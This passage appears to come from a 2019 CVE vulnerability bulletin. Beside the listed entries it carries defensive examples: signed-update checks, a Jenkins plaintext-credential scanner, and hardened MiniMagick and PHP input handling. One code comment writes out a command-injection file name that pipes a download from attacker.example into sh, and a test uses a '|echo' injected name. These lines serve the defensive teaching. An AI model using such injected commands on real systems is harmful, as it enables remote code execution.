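def apply_update(public_key, package_bytes, signature)
  return :rejected unless signature_valid?(public_key, package_bytes, signature)
  :applied
end

# Constructed sample package and an attacker's substitute signed with the
# attacker's own key (the case the pinned public key exists to defeat).
GENUINE_UPDATE   = "i-oneNet upgrade bundle (constructed sample bytes)".b
GENUINE_SIG      = sign_package(VENDOR_PRIVATE_KEY, GENUINE_UPDATE)
MALICIOUS_UPDATE = "attacker-built bundle carrying a webshell (constructed)".b
ATTACKER_KEY     = OpenSSL::PKey::RSA.new(2048)
FORGED_SIG       = sign_package(ATTACKER_KEY, MALICIOUS_UPDATE)

if __FILE__ == $PROGRAM_NAME
  puts apply_update(VENDOR_PUBLIC_KEY, GENUINE_UPDATE, GENUINE_SIG)     # applied
  puts apply_update(VENDOR_PUBLIC_KEY, MALICIOUS_UPDATE, GENUINE_SIG)   # rejected
  puts apply_update(VENDOR_PUBLIC_KEY, MALICIOUS_UPDATE, FORGED_SIG)    # rejected
  # The attacker ships a digest that matches their own package, so this passes.
  puts checksum_only_valid?(MALICIOUS_UPDATE,
                            OpenSSL::Digest::SHA256.hexdigest(MALICIOUS_UPDATE))  # true
end
```

The verification must run before any part of the package is unpacked or executed, and the public key must come from the installed client, never from the package or the download channel.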

ibm -- content_navigator | CVE-2019-4263 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: XF, CONFIRM
IBM Content Navigator 3.0CD is vulnerable to local file inclusion, allowing an attacker to access a configuration file in the ICN server. IBM X-Force ID: 160015.

ibm -- security_identity_manager | CVE-2018-1968 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM, XF
IBM Security Identity Manager 7.0.1 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 153749.

intel -- processor_diagnostic_tool | CVE-2019-11133 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: BID, CONFIRM
Improper access control in the Intel(R) Processor Diagnostic Tool before version 4.1.2.24 may allow an authenticated user to potentially enable escalation of privilege, information disclosure or denial of service via local access.

intel -- ssd_dc_s4500_and_s4600_devices | CVE-2018-18095 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: BID, CONFIRM
Improper authentication in firmware for Intel(R) SSD DC S4500 Series and Intel(R) SSD DC S4600 Series before SCV10150 may allow an unprivileged user to potentially enable escalation of privilege via physical access.

intuit -- lacerte | CVE-2018-14833 | published 2019-07-09 | CVSS score: not yet calculated | source & patch info: MISC, MISC
Intuit Lacerte 2017 has Incorrect Access Control.

invoxia -- nvx220_devices | CVE-2018-14528 | published 2019-07-05 | CVSS score: not yet calculated | source & patch info: MISC
Invoxia NVX220 devices allow TELNET access as admin with a default password.

ivanti -- endpoint_manager | CVE-2019-10651 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM
An issue was discovered in the Core Server in Ivanti Endpoint Manager (EPM) 2017.3 before SU7 and 2018.x before 2018.3 SU3, with remote code execution. In other words, the issue affects 2017.3, 2018.1, and 2018.3 installations that lack the April 2019 update.

jenkins -- jenkins | CVE-2019-10350 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
Jenkins Port Allocator Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.

jenkins -- jenkins | CVE-2019-10349 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC, MLIST, MISC
A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript into the plugin-provided web pages in Jenkins.

jenkins -- jenkins | CVE-2019-10348 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
Jenkins Gogs Plugin stored credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.

jenkins -- jenkins | CVE-2019-10347 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
Jenkins Mashup Portlets Plugin stored credentials unencrypted on the Jenkins master where they can be viewed by users with access to the master file system.

jenkins -- jenkins | CVE-2019-10346 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
A reflected cross site scripting vulnerability in Jenkins Embeddable Build Status Plugin 2.0.1 and earlier allowed attackers to inject arbitrary HTML and JavaScript into the response of this plugin.

jenkins -- jenkins | CVE-2019-10342 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in various 'fillCredentialsIdItems' methods allowed users with Overall/Read access to enumerate the credentials IDs of credentials stored in Jenkins.

jenkins -- jenkins | CVE-2019-10341 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in DockerAPI.DescriptorImpl#doTestConnection allowed users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

jenkins -- jenkins | CVE-2019-10340 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
A cross-site request forgery vulnerability in Jenkins Docker Plugin 1.1.6 and earlier in DockerAPI.DescriptorImpl#doTestConnection allowed users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

jenkins -- jenkins | CVE-2019-10351 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MLIST, MISC
Jenkins Caliper CI Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.
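Four of the Jenkins entries above (Port Allocator, Gogs, Mashup Portlets and Caliper CI) share one defect: a plugin wrote a secret into config.xml as plain text instead of through hudson.util.Secret, which serialises encrypted values as base64 wrapped in braces. The Ruby scanner below is an added example for auditing a Jenkins master for that pattern; it is not code from Jenkins or from any of the plugins. It walks a job config.xml and reports credential-looking elements whose value is not in the braced Secret form. The sample config, the plugin class name and the element names in it are constructed for the example and do not reproduce any real plugin's schema.

```ruby
require "rexml/document"

# Element names that usually carry a secret. "credentialsId" is deliberately
# not matched: it is a reference into the credentials store, not a secret.
CREDENTIAL_NAME = /password|passwd|secret|token|api[_-]?key/i

# hudson.util.Secret serialises encrypted values as base64 inside braces,
# e.g. {AQAAABAAAAAw...}. A credential-looking element whose value is not of
# that form holds the secret in the clear.
ENCRYPTED_SECRET = %r{\A\{[A-Za-z0-9+/=]+\}\z}

Finding = Struct.new(:xpath, :name, :preview)

# Returns one Finding per plaintext credential found in +config_xml+.
# The preview keeps three characters so a report can be matched to a value
# without copying the whole secret into a ticket.
def plaintext_credentials(config_xml)
  doc = REXML::Document.new(config_xml)
  findings = []
  doc.root.each_recursive do |el|
    next unless el.name.match?(CREDENTIAL_NAME)
    value = el.text.to_s.strip
    next if value.empty? || value.match?(ENCRYPTED_SECRET)
    findings << Finding.new(el.xpath, el.name, value[0, 3] + "***")
  end
  findings
end

# Constructed sample job config.xml (not taken from a real Jenkins instance).
SAMPLE_CONFIG = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <project>
    <description>build-and-push</description>
    <publishers>
      <org.example.ExampleNotifier>
        <serverUrl>https://git.example.internal</serverUrl>
        <credentialsId>git-deploy</credentialsId>
        <password>hunter2</password>
        <apiToken>{AQAAABAAAAAwY29uc3RydWN0ZWQtc2FtcGxlLXNlY3JldA==}</apiToken>
        <proxyPassword></proxyPassword>
      </org.example.ExampleNotifier>
    </publishers>
  </project>
XML

if __FILE__ == $PROGRAM_NAME
  plaintext_credentials(SAMPLE_CONFIG).each do |f|
    puts "#{f.xpath}: <#{f.name}> holds a plaintext value (#{f.preview})"
  end
end
```

Run it over every `jobs/*/config.xml` (and the plugin descriptor XML files under `$JENKINS_HOME`) on the master; anything it reports is readable by Extended Read users and by anyone with file-system access, which is exactly the exposure the four advisories describe.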

juniper -- junos_os | CVE-2019-0046 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM
A vulnerability in the pfe-chassisd Chassis Manager (CMLC) daemon of Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) to the EX4300 when specific valid broadcast packets create a broadcast storm condition when received on the me0 interface of the EX4300 Series device. A reboot of the device is required to restore service. Continued receipt of these valid broadcast packets will create a sustained Denial of Service (DoS) against the device. Affected releases are Juniper Networks Junos OS: 16.1 versions above and including 16.1R1 prior to 16.1R7-S5; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R3; 17.3 versions prior to 17.3R3-S2; 17.4 versions prior to 17.4R2; 18.1 versions prior to 18.1R3; 18.2 versions prior to 18.2R2.

juniper -- junos_os | CVE-2019-0048 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM
On EX4300 Series switches with TCAM optimization enabled, incoming multicast traffic matches an implicit loopback filter rule first, since it has high priority. This rule is meant for reserved multicast addresses 224.0.0.x, but incorrectly matches on 224.x.x.x. Due to this bug, when a firewall filter is applied on the loopback interface, other firewall filters might stop working for multicast traffic. The command 'show firewall filter' can be used to confirm whether the filter is working. This issue only affects the EX4300 switch. No other products or platforms are affected by this vulnerability. This issue affects: Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D51, 14.1X53-D115 on EX4300 Series; 17.1 versions prior to 17.1R3 on EX4300 Series; 17.2 versions prior to 17.2R3-S2 on EX4300 Series; 17.3 versions prior to 17.3R3-S3 on EX4300 Series; 17.4 versions prior to 17.4R2-S5, 17.4R3 on EX4300 Series; 18.1 versions prior to 18.1R3-S1 on EX4300 Series; 18.2 versions prior to 18.2R2 on EX4300 Series; 18.3 versions prior to 18.3R2 on EX4300 Series.

juniper -- junos_os | CVE-2019-0049 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM
On Junos devices with the BGP graceful restart helper mode enabled or the BGP graceful restart mechanism enabled, a certain sequence of BGP session restart on a remote peer that has the graceful restart mechanism enabled may cause the local routing protocol daemon (RPD) process to crash and restart. Repeated crashes of the RPD process can cause prolonged Denial of Service (DoS). Graceful restart helper mode for BGP is enabled by default. No other Juniper Networks products or platforms are affected by this issue. Affected releases are Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S3; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R3; 17.2X75 versions prior to 17.2X75-D105; 17.3 versions prior to 17.3R3-S2; 17.4 versions prior to 17.4R1-S7, 17.4R2-S2, 17.4R3; 18.1 versions prior to 18.1R3-S2; 18.2 versions prior to 18.2R2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D30; 18.3 versions prior to 18.3R1-S4, 18.3R2. Junos OS releases prior to 16.1R1 are not affected.

juniper -- junos_os | CVE-2019-0052 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM
The srxpfe process may crash on SRX Series services gateways when the UTM module processes a specific fragmented HTTP packet. The packet is misinterpreted as a regular TCP packet, which causes the processor to crash. This issue affects all SRX Series platforms that support URL-Filtering and have web-filtering enabled. Affected releases are Juniper Networks Junos OS: 12.3X48 versions prior to 12.3X48-D85 on SRX Series; 15.1X49 versions prior to 15.1X49-D181, 15.1X49-D190 on SRX Series; 17.3 versions on SRX Series; 17.4 versions prior to 17.4R1-S8, 17.4R2-S5, 17.4R3 on SRX Series; 18.1 versions prior to 18.1R3-S6 on SRX Series; 18.2 versions prior to 18.2R2-S1, 18.2R3 on SRX Series; 18.3 versions prior to 18.3R1-S2, 18.3R2 on SRX Series; 18.4 versions prior to 18.4R1-S1, 18.4R2 on SRX Series.

juniper -- junos_os | CVE-2019-0053 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client (accessible from the CLI or shell) in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3-S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2.

leanote -- leanote | CVE-2019-1010003 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
Leanote prior to version 2.6 is affected by Cross Site Scripting (XSS).

libpng -- libpng | CVE-2017-12652 | published 2019-07-10 | CVSS score: not yet calculated | source & patch info: CONFIRM
libpng before 1.6.32 does not properly check the length of chunks against the user limit.

linux -- linux_kernel | CVE-2019-10638 | published 2019-07-05 | CVSS score: not yet calculated | source & patch info: BID, MISC (x8)
In the Linux kernel before 5.1.7, a device can be tracked by an attacker using the IP ID values the kernel produces for connection-less protocols (e.g., UDP and ICMP). When such traffic is sent to multiple destination IP addresses, it is possible to obtain hash collisions (of indices to the counter array) and thereby obtain the hashing key (via enumeration). An attack may be conducted by hosting a crafted web page that uses WebRTC or gQUIC to force UDP traffic to attacker-controlled IP addresses.

linux -- linux_kernel | CVE-2019-10639 | published 2019-07-05 | CVSS score: not yet calculated | source & patch info: MISC (x4)
The Linux kernel 4.x (starting from 4.1) and 5.x before 5.0.8 allows Information Exposure (partial kernel address disclosure), leading to a KASLR bypass. Specifically, it is possible to extract the KASLR kernel image offset using the IP ID values the kernel produces for connection-less protocols (e.g., UDP and ICMP). When such traffic is sent to multiple destination IP addresses, it is possible to obtain hash collisions (of indices to the counter array) and thereby obtain the hashing key (via enumeration). This key contains enough bits from a kernel address (of a static variable) so that when the key is extracted (via enumeration), the offset of the kernel image is exposed. This attack can be carried out remotely, by the attacker forcing the target device to send UDP or ICMP (or certain other) traffic to attacker-controlled IP addresses. Forcing a server to send UDP traffic is trivial if the server is a DNS server. ICMP traffic is trivial if the server answers ICMP Echo requests (ping). For client targets, if the target visits the attacker's web page, then WebRTC or gQUIC can be used to force UDP traffic to attacker-controlled IP addresses. NOTE: this attack against KASLR became viable in 4.1 because IP ID generation was changed to have a dependency on an address associated with a network namespace.

london_trust_media -- private_internet_access_vpn_client_for_linux | CVE-2019-12578 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The openvpn_launcher.64 binary is setuid root. This binary executes /opt/pia/openvpn-64/openvpn, passing the parameters provided from the command line. Care was taken to programmatically disable potentially dangerous openvpn parameters; however, the --route-pre-down parameter can be used. This parameter accepts an arbitrary path to a script/program to be executed when OpenVPN exits. The --script-security parameter also needs to be passed to allow this action to be taken, and --script-security is not currently in the disabled parameter list. A local unprivileged user can pass a malicious script/binary to the --route-pre-down option, which will be executed as root when openvpn is stopped.

london_trust_media -- private_internet_access_vpn_client_for_linux | CVE-2019-12575 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The root_runner.64 binary is setuid root. This binary executes /opt/pia/ruby/64/ruby, which in turn attempts to load several libraries under /tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious library under this path to execute arbitrary code as the root user.

london_trust_media -- private_internet_access_vpn_client_for_linux_and_macos | CVE-2019-12579 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The PIA Linux/macOS binary openvpn_launcher.64 is setuid root. This binary accepts several parameters to update the system configuration. These parameters are passed to operating system commands using a "here" document. The parameters are not sanitized, which allows arbitrary commands to be injected using shell metacharacters. A local unprivileged user can pass specially crafted parameters that will be interpolated by the operating system calls.

london_trust_media -- private_internet_access_vpn_client_for_linux_and_macos | CVE-2019-12573 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files. The openvpn_launcher binary is setuid root. This binary supports the --log option, which accepts a path as an argument. This parameter is not sanitized, which allows a local unprivileged user to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.

london_trust_media -- private_internet_access_vpn_client_for_macos | CVE-2019-12576 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The openvpn_launcher binary is setuid root. This program is called during the connection process and executes several operating system utilities to configure the system. The networksetup utility is called using relative paths. A local unprivileged user can execute arbitrary commands as root by creating a networksetup trojan which will be executed during the connection process. This is possible because the PATH environment variable is not reset prior to executing the OS utility.

london_trust_media -- private_internet_access_vpn_client_for_macos | CVE-2019-12571 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to overwrite arbitrary files. When the client initiates a connection, the XML file /tmp/pia-watcher.plist is created. If the file exists, it will be truncated and the contents completely overwritten. This file is removed on disconnect. An unprivileged user can create a hard or soft link to arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.

london_trust_media -- private_internet_access_vpn_client_for_macos | CVE-2019-12577 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The macOS binary openvpn_launcher.64 is setuid root. This binary creates /tmp/pia_upscript.sh when executed. Because the file creation mask (umask) is not reset, the umask value is inherited from the calling process. This value can be manipulated to cause the privileged binary to create files with world-writable permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the connect process to execute arbitrary code as the root user.

london_trust_media -- private_internet_access_vpn_client_for_windows | CVE-2019-12574 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v1.0 for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The PIA client is vulnerable to a DLL injection vulnerability during the software update process. The updater loads several libraries from a folder that authenticated users have write access to. A low privileged user can leverage this vulnerability to execute arbitrary code as SYSTEM.

mailenable -- mailenable_enterprise_premium | CVE-2019-12925 | published 2019-07-08 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
MailEnable Enterprise Premium 10.23 was vulnerable to multiple directory traversal issues, with which authenticated users could add, remove, or potentially read files in arbitrary folders accessible by the IIS user. This could lead to reading other users' credentials including those of SYSADMIN accounts, reading other users' emails, or adding emails or files to other users' accounts.

mailenable -- mailenable_enterprise_premium | CVE-2019-12926 | published 2019-07-08 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
MailEnable Enterprise Premium 10.23 did not use appropriate access control checks in a number of areas. As a result, it was possible to perform a number of actions, when logged in as a user, that the user should not have had permission to perform. It was also possible to gain access to areas within the application for which the accounts used were supposed to have insufficient access.

mailenable -- mailenable_enterprise_premium | CVE-2019-12927 | published 2019-07-08 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
MailEnable Enterprise Premium 10.23 was vulnerable to stored and reflected cross-site scripting (XSS) attacks. Because the session cookie did not use the HttpOnly flag, it was possible to hijack the session cookie by exploiting this vulnerability.

mailenable -- mailenable_enterprise_premium | CVE-2019-12924 | published 2019-07-08 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
MailEnable Enterprise Premium 10.23 was vulnerable to XML External Entity Injection (XXE) attacks that could be exploited by an unauthenticated user. It was possible for an attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system. Because all credentials were stored in a cleartext file, it was possible to steal all users' credentials (including those of the highest privileged users).

mailenable -- mailenable_enterprise_premium | CVE-2019-12923 | published 2019-07-08 | CVSS score: not yet calculated | source & patch info: CONFIRM, MISC
In MailEnable Enterprise Premium 10.23, the potential cross-site request forgery (CSRF) protection mechanism was not implemented correctly and it was possible to bypass it by removing the anti-CSRF token parameter from the request. This could allow an attacker to manipulate a user into unwittingly performing actions within the application (such as sending email, adding contacts, or changing settings) on behalf of the attacker.

matrixssl -- matrixssl | CVE-2019-13470 | published 2019-07-09 | CVSS score: not yet calculated | source & patch info: MISC
MatrixSSL before 4.2.1 has an out-of-bounds read during ASN.1 handling.

minimagick -- minmagick | CVE-2019-13574 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC (x4), DEBIAN
In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts a '|' character followed by a command.
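The MiniMagick entry above is a property of Ruby's Kernel#open rather than of image handling: a name beginning with "|" is run as a command and its output is returned as the file contents. The Ruby example below is added here to show the vulnerable shape next to the hardened one; it is not MiniMagick's code, and the function names and the temp-file round trip are constructed for the example. The fix has two parts: reject any remote-derived name that could be interpreted as anything but a plain path, and open with File.open, which never spawns a process whatever the name looks like.

```ruby
require "tempfile"

# Vulnerable shape (never call with untrusted input): Kernel#open treats a
# leading "|" as "run this command and hand me its stdout", so a remote name
# of "|curl http://attacker.example/x | sh" runs the command instead of
# opening a file. Kept here only to show the bug; the tests never call it.
def read_image_unsafe(name)
  open(name, "rb") { |io| io.read }
end

# A remote-derived name is acceptable only if it can never be read as
# something other than a filesystem path: no pipe prefix, no URI scheme
# (open-uri, when loaded, teaches Kernel#open to fetch URLs), no NUL byte.
# On Windows a bare drive prefix such as "C:" also matches the scheme test;
# build paths from a known directory rather than passing drive letters here.
def plain_file_name?(name)
  return false if name.nil? || name.empty?
  return false if name.start_with?("|")
  return false if name.match?(/\A[a-z][a-z0-9+.\-]*:/i)  # http:, ftp:, file:, ...
  return false if name.include?("\0")
  true
end

# Hardened: validate, then use File.open, which only ever opens a path.
def read_image_safe(name)
  unless plain_file_name?(name)
    raise ArgumentError, "refusing unsafe file name #{name.inspect}"
  end
  File.open(name, "rb") { |io| io.read }
end

# Constructed sample: write a few bytes to a temp file and read them back
# through the hardened path.
def demo_roundtrip
  Tempfile.create(["sample", ".gif"]) do |f|
    f.binmode
    f.write("GIF89a")
    f.flush
    read_image_safe(f.path)
  end
end

if __FILE__ == $PROGRAM_NAME
  puts demo_roundtrip                          # GIF89a
  puts plain_file_name?("|echo pwned")         # false
  puts plain_file_name?("http://x/cat.jpg")    # false
end
```

The same rule applies to any Ruby code that turns a URL or a Content-Disposition header into a local name: treat the name as data, pass it to File.open (or IO.binread), and leave Kernel#open for trusted literals only.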

mobatech -- mobaxterm | CVE-2019-13475 | published 2019-07-09 | CVSS score: not yet calculated | source & patch info: MISC
In MobaXterm 11.1, the mobaxterm: URI handler has an argument injection vulnerability that allows remote attackers to execute arbitrary commands when the user visits a specially crafted URL. Based on the available command-line arguments of the software, one can simply inject -exec to execute arbitrary commands. The additional arguments -hideterm and -exitwhendone in the payload make the attack less visible.

mybb -- mybb | CVE-2019-12363 | published 2019-07-11 | CVSS score: not yet calculated | source & patch info: MISC, MISC
A CSRF issue was discovered in the JN-Jones MyBB-2FA plugin through 2014-11-05 for MyBB. An attacker can forge a request to an installed mybb2fa plugin to control its state via usercp.php?action=mybb2fa&do=deactivate (or usercp.php?action=mybb2fa&do=activate). A deactivate operation lowers the security of the targeted account by disabling two factor authentication.

netfilter -- iptables
Description: A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.
Published: 2019-07-12
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-11360; MISC, CONFIRM

netiq -- advanced_authentication_framework
Description: A potential Man in the Middle (MITM) attack was found in NetIQ Advanced Authentication Framework versions prior to 6.0.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-11650; CONFIRM

npmjs -- serve-here.js
Description: A path traversal vulnerability in versions up to v1.1.3 of the serve-here.js npm module allows attackers to list any file in an arbitrary folder.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-5444; MISC

nuxt -- nuxt.js
Description: @nuxt/devalue before 1.2.3, as used in Nuxt.js before 2.6.2, mishandles object keys, leading to XSS.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13506; MISC

ovirt -- ovirt_metrics
Description: Sensitive passwords used in deployment and configuration of oVirt Metrics, all versions, were found to be insufficiently protected. Passwords could be disclosed in log files (if playbooks are run with -v) or in playbooks stored on Metrics or Bastion hosts.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10194; CONFIRM

patchwork -- patchwork
Description: A Cross Site Scripting (XSS) vulnerability exists in the template tag used to render message ids in Patchwork v1.1 through v2.1.x. This allows an attacker to insert JavaScript or HTML into the patch detail page via an email sent to a mailing list consumed by Patchwork. This affects the function msgid in templatetags/patch.py. Patchwork versions v2.1.4 and v2.0.4 will contain the fix.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13122; MISC, MLIST

php -- php
Description: main/streams/xp_socket.c in PHP 7.x before 2017-03-07 misparses fsockopen calls, such as by interpreting fsockopen('127.0.0.1:80', 443) as if the address/port were 127.0.0.1:80:443, which is later truncated to 127.0.0.1:80. This behavior has a security risk if the explicitly provided port number (i.e., 443 in this example) is hardcoded into an application as a security policy, but the hostname argument (i.e., 127.0.0.1:80 in this example) is obtained from untrusted input.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2017-7189; MISC
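The security-relevant point of the PHP entry is the combination of an attacker-controlled hostname with a port that the application hardcodes as policy. The following added example (not PHP's xp_socket.c) models the misparse the entry describes in flawed_target and shows a host validator a caller can apply before the hostname ever reaches the connect call; the function names are this example's own and the validator is a conservative one, not PHP's parser.

```python
import ipaddress
import re

# One DNS label per RFC 1123: letters, digits and hyphen, no leading or trailing hyphen.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(\.{_LABEL})*$")


def flawed_target(host: str, port: int) -> tuple:
    """Model of the behaviour the entry describes: host and port are joined into
    one 'host:port' string and the result is re-split, so a host that already
    carries a port wins and the trailing, hardcoded port is discarded."""
    joined = f"{host}:{port}"            # '127.0.0.1:80' + 443 -> '127.0.0.1:80:443'
    h, _, rest = joined.partition(":")
    p = rest.split(":", 1)[0]            # '80:443' truncated to '80'
    return h, int(p)


def hardened_target(host: str, port: int) -> tuple:
    """Validate the untrusted host before combining it with the policy port.
    Accepts a DNS hostname, an IPv4 literal or a bracketed IPv6 literal and
    rejects anything that smuggles a port, a path, credentials or whitespace."""
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    if host.startswith("[") and host.endswith("]"):
        ipaddress.IPv6Address(host[1:-1])   # raises ValueError on anything that is not IPv6
        return host, port
    if any(ch in host for ch in ":/@") or any(ch.isspace() for ch in host):
        raise ValueError(f"host carries an embedded port, path or credentials: {host!r}")
    try:
        ipaddress.IPv4Address(host)
        return host, port
    except ValueError:
        pass                                # not an IPv4 literal; check as a hostname
    if not _HOSTNAME_RE.match(host):
        raise ValueError(f"not a valid hostname: {host!r}")
    return host, port


def rejects(host: str, port: int) -> bool:
    """True when hardened_target refuses the host, i.e. the policy port survives."""
    try:
        hardened_target(host, port)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("flawed:  ", flawed_target("127.0.0.1:80", 443))   # policy port 443 lost
    print("hardened:", hardened_target("127.0.0.1", 443))
    print("rejected:", rejects("127.0.0.1:80", 443))
```

The general rule is the one the entry implies: when a port is policy, the host must be validated as a host (no separator characters) before the two are ever concatenated into a connection string.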

prestashop -- prestashop
Description: In PrestaShop before 1.7.6.0 RC2, the id_address_delivery and id_address_invoice parameters are affected by an Insecure Direct Object Reference vulnerability due to a guessable value sent to the web application during checkout. An attacker could leak personal customer information. This is PrestaShop bug #14444.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13461; MISC

project_redcap -- redcap
Description: Multiple stored Cross-site scripting (XSS) issues in the admin panel and survey system in REDCap 8 before 8.10.20 and 9 before 9.1.2 allow an attacker to inject arbitrary malicious HTML or JavaScript code into a user's web browser.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13029; MISC

python -- python
